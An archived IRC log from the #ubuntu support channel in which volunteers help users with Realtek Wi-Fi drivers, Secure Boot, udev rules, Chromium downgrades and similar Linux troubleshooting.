xEth0s2xk i'm back19:36
xEth0s2xanyone know if i can get the on board realtek card running?19:37
jeremy31xEth0s2x in terminal> lspci -nnk | grep -iA3 net | nc termbin.com 999919:37
TJ-Are you using the code from : remote.origin.url=https://github.com/abperiasamy/rtl8812AU_8821AU_linux.git19:38
jeremy31xEth0s2x post the URL19:38
xEth0s2xkk19:38
xEth0s2xhttp://termbin.com/enk319:39
xEth0s2xtj- when i installed the driver for the netgear i installed from the gui under software updater. not sure where it got the code19:40
xEth0s2xeither card is fine (usb card or the onboard. i'd rather have the onboard working obv but, i'll take what i can get.19:41
TJ-xEth0s2x: ok, which release of Ubuntu is it, and what does this report "uname -r" ?19:42
xEth0s2x17.1019:42
xEth0s2x4.13.0-37-generic19:42
TJ-xEth0s2x: the correct driver for that internal PCI device is: /lib/modules/4.15.0-12-generic/modules.alias:20015:alias pci:v000010ECd0000B822sv*sd*bc*sc*i* r8822be19:43
ioriaTJ-, 4.15 ?19:43
jeremy31xEth0s2x see https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e19:43
xEth0s2xalright, tyvm. can i apt-get install for it?19:43
jeremy31xEth0s2x you can add support using Larry Finger's github rtlwifi-new extended branch19:44
TJ-xEth0s2x: that modules (r8822be) isn't in the 4.13 kernel but it is in the 4.15 kernel which we have in 18.04 Bionic. On 16.04 there's a package to install the 4.15 kernel, but I don't think there's a similar package in 17.10 to pull in the 18.04 kernel19:44
TJ-xEth0s2x: the preference would be to install an Ubuntu-packaged kernel that supports the device19:45
xEth0s2xsucks to be a linux newb lol19:45
ioriaxEth0sx, please, can you paste    ubuntu-drivers list    output19:45
xEth0s2xyes i can one sec19:46
TJ-xEth0s2x: one option might be to do an early release-upgrade from 17.10 to 18.04, which is due for release at the end of April. That'd bring in the 4.15 kernel.19:47
xEth0s2xrtl8812au-dkms19:47
ioriadidn't know ubuntu got realtek proprietary drivers19:47
jeremy31rtl8812au-dkms is an Ubuntu package with dkms faults19:47
xEth0s2xtj- i can try that. i saw the betas were out19:48
jeremy31xEth0s2x or run the commands at https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e19:48
xEth0s2xk i'm on it19:48
xEth0s2xty guys btw19:50
xEth0s2xk build essential installing. running through my phone for internet so a bit slow lol19:51
TJ-jeremy31: but the rtl8812au is for USB device not PCI19:52
TJ-xEth0s2x: the rtl8812au-dkms will drive the USB device but not te built-in PCI device (which is the 8812be)19:53
jeremy31TJ they might have that listed for the USB19:53
TJ-jeremy31: correct19:53
jeremy31TJ the github is a better choice for the USB as the dkms works19:53
TJ-xEth0s2x: for the 8812be an upgrade to 18.04 Bionic would give you the 4.15 linux kernel that supports the PCI device19:53
TJ-jeremy31: yes, I know, I've been hacking on that code for a long time :)19:54
jeremy31TJ why is it not fixed?  I posted a comment with the fix on a rtl8812au-dkms bug report19:55
TJ-jeremy31: I have no idea! I've raised the issue many times, but as with many things Canonical, they love the shiny new but can't be bothered with following up19:55
xEth0s2xthe comp having the issues is my kids laptop i felt bad lol. 15 years old and i talked him into trying linux. then i broke it lol19:57
xEth0s2xi've had no problems at all with ubuntu on my comp19:58
jeremy31xEth0s2x You also posted on ubuntuforums.org?19:58
xEth0s2xyes i did19:58
xEth0s2xcouple days ago got no response19:58
xEth0s2xjeremy- install completed19:59
jeremy31xEth0s2x One reply from praseodym an hour ago.  I am a moderator there.  You can reboot it19:59
xEth0s2xwhat do i need to do next?19:59
xEth0s2xkk19:59
xEth0s2xbrb19:59
=== lubuntu is now known as Guest44893
blackmatrix_nyHi Everyone...Im trying to install hostapd but it won't find the package. I was searching for the ppa but couldn't find it. Can you please help20:03
TJ-should have just done modprobe, or re-plugged the USB device!20:04
xEth0s3xstill showing no wireless card detected20:05
xEth0s3x"no wifi adapter found" under settings i mean20:05
jeremy31xEth0s2x Is secure boot disabled in UEFI/BIOS?  try> sudo modprobe rtl8822be20:06
xEth0s3xsecure boot should be disabled20:06
xEth0s3xmodprobe is giving me the required key not available error like secure boot is enabled lol20:07
jeremy31xEth0s2x That would be a big sign that it is enabled yet20:08
xEth0s3xikr lol20:08
YounderDoes NVIDIA sign it's drivers with a sha256 hash these days. I seem to have secure boot disabled, but I have a feeling this is no longer necessary.20:08
xEth0s3xdisabled it on install20:08
xEth0s3xk ill try diabling it again20:09
jeremy31xEth0s3x see what this says> mokutil --sb-state20:09
Kristineis there any way to get netplan to use point-to-point routing ? it's required by my host20:09
IsFunnyHey everyone. I am trying to boot my pc but i only get a black screen after bios. Not even grub. Any ideas?20:10
TJ-IsFunny: Does tapping Esc key whilst GRUB is starting display it's menu?20:14
laptop_hi i need help finding a speech command via microphone app for linux20:23
jeremy31xEth0s2x I already replied to your forum post20:30
xEth0s2xkk20:30
cvdd43ohh20:31
jeremy31xEth0s2x The rtl8812au-dkms doesn't support your USB device, I would> sudo apt-get purge rtl8812au-dkms20:32
xEth0s2xkk20:32
xEth0s2xi installed pastebinit20:32
xEth0s2xor ran whichever20:32
jeremy31xEth0s2x Do you still have the gist links I posted earlier?20:32
xEth0s2xnot sure the proper way on posting to the forums though20:33
xEth0s2xjeremy- lost when i rebooted20:33
jeremy31xEth0s2x Post the info I asked for on the post, we can go from there20:33
xEth0s2xkk bud ty20:34
xEth0s2xfound how to add the code tags20:34
jeremy31xEth0s2x https://gist.github.com/jeremyb31/e08fe3f177eea0cb623d0f9c4f554339 and https://gist.github.com/jeremyb31/8687eec6ea7f9dca9e71a24aab197f0e20:35
TJ-for the rtl8812au driver you can add the vendor:product IDs to it if it doesn't have them already20:35
xEth0s2xjeremy-  mokutil state shows secure boot enabled20:36
jeremy31xEth0s2x That has to be changed in BIOS/UEFI so the drivers can load, otherwise only TJ's idea of switching to the 4.15 kernel will work for the internal wifi20:39
xEth0s2xkk. whichever is fine for me. gimme a min.20:40
xEth0s2xid be up for uograding to 18.04 on my comp if its possible before release20:40
jeremy31xEth0s2x try in terminal> sudo update-secureboot-policy20:41
jeremy31see if that allows you to disable, I think I used it once20:41
YounderxEth0s2x, I'm running 18.04 in a virtual machine and it seems to work fine now. As a general rule it is better to wait to i'ts out of beta. Better still to wait to July when a .1 bug patch seems to surface.20:44
tomreyna "point release"20:45
jeremy31xEth0s2x https://wiki.manjaro.org/index.php?title=UEFI_-_Disable_Secure_Boot might help20:45
posjeremy31, will fuck up bitlocker if he's dual booting20:45
jeremy31If they could just get Secure Boot disabled the wifi would work20:52
xEth0sxlooking for the option in bios settings to disable secure boot not finding it20:55
jeremy31xEth0sx Likely in a somewhat hidden boot option or security menu20:56
xEth0sxkk20:56
xEth0sxfound it20:57
jeremy31xEth0sx awesome20:58
xEth0sxk what was that modprobe command u gave me earlier20:59
xEth0sxthe name of the driver i mean21:00
xEth0sxlol21:00
jeremy31xEth0sx It should load > sudo modprobe -v rtl8822be21:00
xEth0sxrtl8812be nlt found in directory21:01
xEth0sx*not21:01
jeremy31rtl8822be21:01
xEth0sxoops21:01
xEth0sxrebooting21:02
xEth0sxdude ty it worked21:03
jeremy31xEth0sx Hope your kid likes it21:04
xEth0sxme too hoping im making a future comp nerd lol21:04
xEth0sxhad so many issues with win 10 whough it sucked21:05
jeremy31I only use Win 10 at work, I don't really like it21:05
xEth0sxi wiped it from my comp within 4 hours of buying the machine lol21:05
xEth0sxi'm aspiring to work my way into a linux job. gonna take some stufy time though still such a newb21:06
xEth0sx*study21:06
jeremy31xEth0sx Win 8 didn't last that long on this Lenovo21:06
Younderjeremy31, If you do things like mechanical CAD there isn't much choice. There is VariCAD and that's about it.21:06
YounderOtherwise desktop software for Linux is mostly on par with windows.21:07
xEth0sxthere  way to go head and upgrade this one to 18.04?21:07
veeruHello21:08
debkadhi21:08
xEth0sxhola21:08
xEth0sxhowdy21:08
veeruwhere are you guys from? :-)21:10
debkadfrom my home21:10
veeruhey, me too21:10
xEth0sxoklahoma, usa21:10
debkad:D21:10
jeremy31Are you sure we are all guys?21:10
veeruMe from India :-)21:11
xEth0sxgeez what a sausage fest ;)21:11
jeremy31!ot | veeru21:11
ubottuveeru: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please register with NickServ (see /msg ubottu !register) and use #ubuntu-offtopic for other topics (though our !guidelines apply there too). Thanks!21:11
=== gr33n7007h is now known as al2o3-cr
jeremy31xEth0sx I added some to the forum post so that it is complete21:16
skinuxActually, I'm not following any tutorial,. I received help from those in #nginx, but it's outside of their scope now.21:29
=== mayday is now known as Guest76759
monerygreetings ubuntu channel21:41
monerydoes anyone offer support, its more of a question about 18.04?21:42
wewladhello21:42
wewladdo daemons write logs using system locale?21:42
moneryI think I am in the wrong channel21:43
wewladby default, I mean21:43
lotuspsychjemonery: #ubuntu+1 please21:43
moneryI noticed after /topic, thx lotuspsychje21:43
JawshBawxHello world22:07
cakohello guys... i have a problem with two USB devices. They keep switching doors every time i reboot, sometimes ttyACM1 and sometimes ttyACM0, my application goes crazy...22:13
cakohave any way to leave these ports default by some hardware ID? Thanks22:13
cako16.04 :)22:13
leftyfbcako: yes, look into udev rules22:14
TJ-cako: easiest is an additional /etc/udev/rules.d/my-ttyACMs.rule that creates dedicated symlinks for each device of the form /dev/ttyMyACM1 pointing to the /dev/ttyACM? node that is being generated by the kernel. Make the rule match on the unique attributes of each device such as a MAC address or serial number, so your symlinks are always for the correct device even when the kernel node names change22:19
=== mudo_ is now known as mudo
JawshBawxI have an interesting issue. I have a lenovo "Thinkpad" yoga 11e 3rd Gen (never again), integrated intel graphics, 4gz ram. I can install 14.04 just fine, but 16.04 or above, I get an issue with both the keyboard and touchpad not working at all. It seems to be stuck in some tabet mode or something because the touchscreen works, but then it bugs out when I try to type or use the mouse. Everything works on Windows and on 14.04 though,22:22
JawshBawxThese issues occur after install and when I'm running the live iso22:22
cakothx leftyfb TJ-22:23
benccis it possible to install a previous version of chromium package?22:35
benccI'm trying to install chromium version 64.0.3282.140-0ubuntu0.16.04.122:35
lotuspsychjebencc: downgrade isnt possible mate22:39
lotuspsychjebencc: whats wrong with your chromium?22:39
FishPencilIs there any way to get CFIS to behave properly with Windows permissions? CFIS doesn't seem to be aware of Windows permissions at all22:40
bencclotuspsychje: there is a bug in chromium 65. not sure we need to go to specifics22:41
bencclotuspsychje: why can't I uninstall 65 and install 64?22:41
lotuspsychjebencc: we reccomend using package versions for your ubuntu version22:48
lotuspsychjebencc: or try !backports or snaps22:48
igrom!backports22:51
ubottuIf new updated Ubuntu packages are built for an application, then they may go into Ubuntu Backports. See https://help.ubuntu.com/community/UbuntuBackports - See also !packaging22:51
igrom!packaging22:51
ubottuThe packaging guide is at http://packaging.ubuntu.com/html/ - See https://wiki.ubuntu.com/UbuntuDevelopment/NewPackages for information on getting a package integrated into Ubuntu - Other developer resources are at https://wiki.ubuntu.com/UbuntuDevelopment - See also !backports and !sponsoring22:51
bencclotuspsychje: chromium 64 was the stable package few days ago. Chromium 65 is missing h264 in webrtc22:52
bencclotuspsychje: that's why I'm trying to install chromium 6422:52
bencclotuspsychje: do you want to see the bug?22:52
TJ-bencc: you can download/install the .deb files manually from the LP build server, e.g. https://launchpad.net/~canonical-chromium-builds/+archive/ubuntu/stage/+build/1430484422:53
TJ-bencc: the list of published packages itself starts at https://launchpad.net/ubuntu/+source/chromium-browser/+publishinghistory22:54
benccI'll try it thanks22:54
benccI'll probably have a problem with chromium webdriver too22:57
wewladwhat language do daemons wrute their logs in?23:02
wewladwrite*23:02
guivercwewlad, if i understand your question; the language is whatever the coder used.  logs aren't usually big in words, but figures/abbreviations that often don't match with any language23:05
wewladguiverc: don't daemons respect system locale?23:05
guivercwewlad, they generally spit out short brief 'IN=00D7BA' type logs; to make them language specific would increased code size by heaps, slow down execution etc... it'd be a waste of resources23:07
TJ-wewlad: it depends if the code is written to use the translation functionality, and where the PO files for translation are available in the locale's language23:07
guivercbeing consistent regardless of language also makes it easier to make scripts/codes to examine logs as they know what text to search for... (the same regarldess of language used)23:08
wewladdo you guys have any prooflinks? I failed to find any23:08
digbyi am running fluxbox, lightdm and docky on ubuntu server. i have installed idesk and want it to show the icons for files in a "desktop" folder. is there an easy way to do this? or should i use a different program to idesk for this task?23:08
digbyi basically want the desktop icons to work the same way as windows, dragging things from my file manager to the desktop and such23:09
TJ-digby: that's generally the realm of a desktop environment23:14
jmgb4Hey fellas. Does anybody use pciepassthrogh to game with ubuntu?23:16
=== ubuntu is now known as Guest66370
guzzlefryWas Skype removed from 16.04?23:32
kostkonguzzlefry, you need to download it from skype.com23:35
agioI think skype is in canonical partners repo23:35
guzzlefryIt doesn't appear to be in that repo.23:35
kostkonagio, even if it is, it's a very old version that does not work/connect to skype network anymore23:35
Guest34818hi23:36
agiokostkon: ah, ok makes sense23:36
guzzlefryThis looks like an Electron app...23:36
Guest34818if i want to check if the given arguments to the script are more than 2 can i use [ $# -gt 2 ]23:37
kostkonguzzlefry, microsoft's way of making it multiplatform23:37
guzzlefrywelp, can't wait to install another messaging app that eats up a gig of RAM... :P23:38
agio1GB ?! that sucks23:38
kostkonguzzlefry, in the 200-300mb range more like23:39
Guest34818#bash23:39
SlidingHornGuest34818, if [[ $# -gt 2 ]]; then    OR   if test "$#" -gt 2; then23:39
guzzlefryoh, that's reasonable. the Slack app is a memory hog.23:40
SlidingHornoops Guest34818 double quote the $# in the first example, my bad23:40
Guest34818[ "$#" -gt 2 ] && echo "error" >&223:41
Guest34818will it bring bug if the first argument is a path23:42
SlidingHornthat I don't know...not much of a scripter myself.23:43
SlidingHornGuest34818, you can ask in #bash though23:43
Guest34818ok thankyou23:45
Guest34818:)23:45
=== Euph0ria is now known as FutureShock
FutureShockDoes anyone know if there is a good firewall app for ubuntu, that has a good GUI and can block/allow individual apps as well as ports, IPs, protocols, etc?   I've been used to using Comodo Firewall on Windows which very user friendly, and hoping to find something (even remotely) like it.23:59

Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!